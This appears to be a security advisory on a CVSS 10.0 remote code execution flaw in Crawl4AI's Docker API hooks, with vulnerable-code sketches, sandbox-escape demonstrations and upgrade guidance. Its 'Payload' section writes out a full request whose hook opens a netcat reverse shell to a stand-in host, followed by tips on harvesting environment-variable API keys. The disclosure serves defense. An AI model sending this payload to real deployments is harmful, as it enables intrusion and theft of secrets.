Feb 16, 2026
Unauthenticated Remote Code Execution in Crawl4AI Docker deployments. The application allows users to define custom Python 'hooks' for web scraping. The sandbox implementation failed to block the `__import__` builtin, allowing attackers to escape the sandbox and execute system commands as the container user. Patch immediately to v0.8.0.
A Critical RCE in Crawl4AI's Docker API allows unauthenticated attackers to execute arbitrary Python code via the 'hooks' parameter. By leveraging an insecure implementation of 'exec()' and a failed attempt at sandboxing that left '__import__' exposed, attackers can bypass restrictions and compromise the host container.
In the gold rush of the AI era, data is the shovel. Crawl4AI positioned itself as the high-speed conveyor belt for that shovel, a tool designed specifically to scrape the web and feed clean data into Large Language Models (LLMs). To make this tool versatile, the developers added a feature that sounded great on paper but was catastrophic in practice: Hooks.
Hooks allow users to modify the scraping behavior on the fly. Need to strip some HTML before processing? Add a hook. Need to execute custom logic when a page loads? Add a hook. In the Docker API deployment, these hooks are passed as strings within a JSON payload.
Here is the problem: to make a hook work, the application has to execute code provided by the user. If you are a security researcher, your ears just perked up. Allowing users to send code to be executed on your server is the digital equivalent of handing a burglar your house keys and asking them to water your plants while you're on vacation. You're trusting them to only water the plants.
The developers of Crawl4AI weren't completely oblivious to the danger. They knew that running raw user code was risky, so they attempted to implement a 'sandbox'. In Python, this usually involves using exec() or eval() with a restricted scope—specifically, by limiting the globals and locals dictionaries passed to the function.
The idea is simple: if you don't give the code access to the os module or the subprocess module, it can't hurt you, right? Wrong. This is the 'blacklist' approach to security, and it almost never works in dynamic languages like Python.
The specific failure here was leaving the __import__ builtin accessible. Python's object model is introspective and powerful. Even if you remove os from the namespace, if __import__ is present, the attacker can simply say "I'd like the os module, please," and Python obliges. The sandbox was effectively a door with a heavy deadbolt but no hinges.
Let's look at what this vulnerability likely looks like under the hood. The exact source isn't reproduced here, but the mechanism described is a classic Python anti-pattern. The vulnerable code takes the hooks parameter from the API request and passes it to an execution handler.
The Vulnerable Logic:

    import math

    # Simplified representation of the flaw
    def execute_hook(hook_code, context):
        # The developer tries to be safe by defining a "safe" scope
        safe_globals = {
            'math': math,
            'str': str,
            # ... other innocuous builtins ...
            # FATAL ERROR: '__builtins__' is never set here, so exec()
            # injects the full builtins module, __import__ included,
            # unless it is explicitly stripped or overwritten
        }
        # The sink
        exec(hook_code, safe_globals)

Because the __builtins__ were not rigorously scrubbed (or were implicitly included), the __import__ function remained available. This meant that while the developer thought they were restricting the environment to string manipulation and basic math, they were actually providing a full shell.
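The behavior described above is easy to reproduce locally. The following is a minimal sketch, not Crawl4AI's actual code: `run_hook` is a hypothetical stand-in for the hook executor, and the "payload" only reads the process ID instead of running a shell command.

```python
import math
import os


def run_hook(hook_code: str) -> dict:
    """Hypothetical stand-in for a hook executor with a 'restricted' scope."""
    # Only two names are exposed on purpose; '__builtins__' is not mentioned.
    scope = {"math": math, "str": str}
    # exec() inserts a reference to the builtins under '__builtins__'
    # whenever the globals dict lacks that key.
    exec(hook_code, scope)
    return scope


# Harmless "payload": import os through the leaked builtin and read the PID.
scope = run_hook("leaked_pid = __import__('os').getpid()")

print("__builtins__" in scope)             # the key was injected by exec()
print(scope["leaked_pid"] == os.getpid())  # the hook reached the os module
```

Swapping `getpid()` for `system(...)` is all it takes to turn this into command execution, which is why the missing `__builtins__` entry is the whole bug.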
The Fix (v0.8.0):
In version 0.8.0, the remediation likely involved either removing the dynamic hook execution feature entirely from the public API or implementing a significantly more robust sandboxing mechanism (though in Python, exec is rarely truly safe). Either way, the immediate recommendation is simply to upgrade.
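The caveat that exec is rarely truly safe can be shown in a few lines. This is a sketch of the most obvious hardening step (overriding `__builtins__` with an empty dict), not the actual v0.8.0 patch, whose contents are not shown in this write-up. The helper name `run_restricted` is hypothetical.

```python
def run_restricted(code: str) -> dict:
    """Hypothetical helper: exec with an explicitly empty builtins table."""
    scope = {"__builtins__": {}}
    exec(code, scope)
    return scope


# With builtins emptied, the direct __import__ call no longer resolves.
try:
    run_restricted("__import__('os')")
    import_blocked = False
except NameError:
    import_blocked = True

# Attribute access needs no builtins, so the class hierarchy is still
# reachable from any literal: tuple -> object -> every loaded subclass.
scope = run_restricted("classes = ().__class__.__base__.__subclasses__()")
still_reachable = len(scope["classes"]) > 0

print(import_blocked, still_reachable)
```

Emptying the builtins stops the one-line payload, but the second snippet shows the interpreter's object graph remains exposed, which is the usual starting point for more elaborate escapes. Isolation at the process or container level is a sturdier boundary than scope trimming.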
Exploiting this is trivially easy for anyone who knows Python. We don't need buffer overflows or heap spraying; we just need to ask the server nicely. The attack vector is the /crawl endpoint, specifically the hooks parameter.
Here is the kill chain:
The attacker supplies code for a hook such as on_execution_started, uses __import__('os') to load the operating system interface, then calls .system() or .popen() to run shell commands.
The Payload:

    POST /crawl HTTP/1.1
    Host: target-ip:8080
    Content-Type: application/json

    {
      "urls": ["http://google.com"],
      "hooks": {
        "on_execution_started": "__import__('os').system('nc -e /bin/sh attacker.com 4444')"
      }
    }

In this scenario, as soon as the crawl job initializes, the server executes the hook. The Python interpreter resolves __import__, loads os, executes the Netcat reverse shell, and suddenly you have a terminal inside their Docker container. From there, you can dump environment variables (which often contain API keys for OpenAI, Anthropic, or AWS), modify the filesystem, or pivot to other containers on the same network.
You might be thinking, "It's just a Docker container, who cares?" You should care. In modern DevOps environments, containers are rarely isolated islands: they often hold secrets in their environment variables and share a network with other services.
With a CVSS score of 10.0, this is a "drop everything and patch" situation. An unauthenticated RCE means that automated botnets will likely start scanning for this vulnerability to install crypto-miners or add the server to a DDoS fleet. If you are running Crawl4AI to power your LLM pipeline, an attacker could also poison your data or steal your proprietary datasets.
The mitigation is straightforward: stop using the vulnerable version. The developers released version 0.8.0 which resolves this issue. If you are running unclecode/crawl4ai in Docker, you need to pull the latest image immediately.
Remediation Steps:

    docker pull unclecode/crawl4ai:latest

Defense in Depth:
Beyond patching, this vulnerability highlights why you shouldn't expose internal tools to the public internet without authentication. Even if the app claims to have auth, put it behind a reverse proxy (like Nginx or Traefik) and enforce your own Basic Auth or mTLS. Never assume an internal tool is hardened against public internet threats.
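In practice the Basic Auth check belongs in the proxy's own configuration (Nginx, Traefik, and similar), but the logic it enforces is small enough to sketch. The function below is illustrative only: `is_authorized` and the sample credentials are hypothetical and not part of Crawl4AI or any proxy.

```python
import base64
import binascii
import hmac
from typing import Optional


def is_authorized(auth_header: Optional[str], user: str, password: str) -> bool:
    """Return True only for a well-formed Basic header with matching credentials."""
    if not auth_header or not auth_header.startswith("Basic "):
        return False
    try:
        decoded = base64.b64decode(auth_header[len("Basic "):], validate=True)
    except (binascii.Error, ValueError):
        return False
    expected = f"{user}:{password}".encode("utf-8")
    # Constant-time comparison avoids leaking how many bytes matched.
    return hmac.compare_digest(decoded, expected)


good = "Basic " + base64.b64encode(b"crawler:s3cret").decode("ascii")
print(is_authorized(good, "crawler", "s3cret"))  # valid credentials
print(is_authorized(None, "crawler", "s3cret"))  # missing header
```

The point of the design is that requests without valid credentials are rejected before they reach the /crawl endpoint at all, so a flaw in the application's own handling is never exposed to anonymous traffic.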
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

| Product | Affected Versions | Fixed Version |
|---|---|---|
| Crawl4AI (unclecode) | < 0.8.0 | 0.8.0 |
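The affected range in the table can be checked programmatically when auditing a fleet. This is a minimal sketch that assumes plain dotted numeric version strings. The names `parse_version` and `is_affected` are hypothetical, and pre-release or suffixed tags would need a proper version parser.

```python
FIXED_VERSION = (0, 8, 0)  # first fixed release according to the table above


def parse_version(version: str) -> tuple:
    """Turn '0.7.4' into (0, 7, 4); assumes purely numeric dotted parts."""
    return tuple(int(part) for part in version.strip().split("."))


def is_affected(version: str) -> bool:
    """True when the version falls in the affected range (< 0.8.0)."""
    return parse_version(version) < FIXED_VERSION


for candidate in ("0.7.8", "0.8.0", "0.10.0"):
    print(candidate, is_affected(candidate))
```

Comparing integer tuples rather than raw strings matters here: as strings, "0.10.0" sorts before "0.8.0" and would be misreported as vulnerable.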
| Attribute | Detail |
|---|---|
| CWE ID | CWE-94 (Improper Control of Generation of Code) |
| CVSS v3.1 | 10.0 (Critical) |
| Attack Vector | Network (Unauthenticated) |
| Impact | Remote Code Execution (RCE) |
| EPSS Score | 0.20% (Rising) |
| Exploit Status | Proof of Concept Available |
The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.
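For readers wondering how the vector string maps to a score of 10.0, the CVSS v3.1 base score arithmetic can be worked through directly. This sketch hard-codes the published metric weights for this specific vector and uses a simplified `roundup` helper (the specification defines a more careful integer-based version to avoid floating-point edge cases).

```python
import math

# CVSS v3.1 weights for AV:N / AC:L / PR:N / UI:N / S:C / C:H / I:H / A:H
AV, AC, PR, UI = 0.85, 0.77, 0.85, 0.85
C = I = A = 0.56


def roundup(value: float) -> float:
    """Round up to one decimal place (simplified relative to the spec)."""
    return math.ceil(value * 10) / 10


# Impact sub-score, using the formula for Scope: Changed.
iss = 1 - (1 - C) * (1 - I) * (1 - A)
impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15

# Exploitability sub-score.
exploitability = 8.22 * AV * AC * PR * UI

# With a changed scope the sum is scaled by 1.08 and capped at 10.
base_score = roundup(min(1.08 * (impact + exploitability), 10))
print(base_score)
```

The uncapped value is already above 10, so the cap is what produces the maximum score: network-reachable, no privileges, no user interaction, changed scope, and full impact on all three properties.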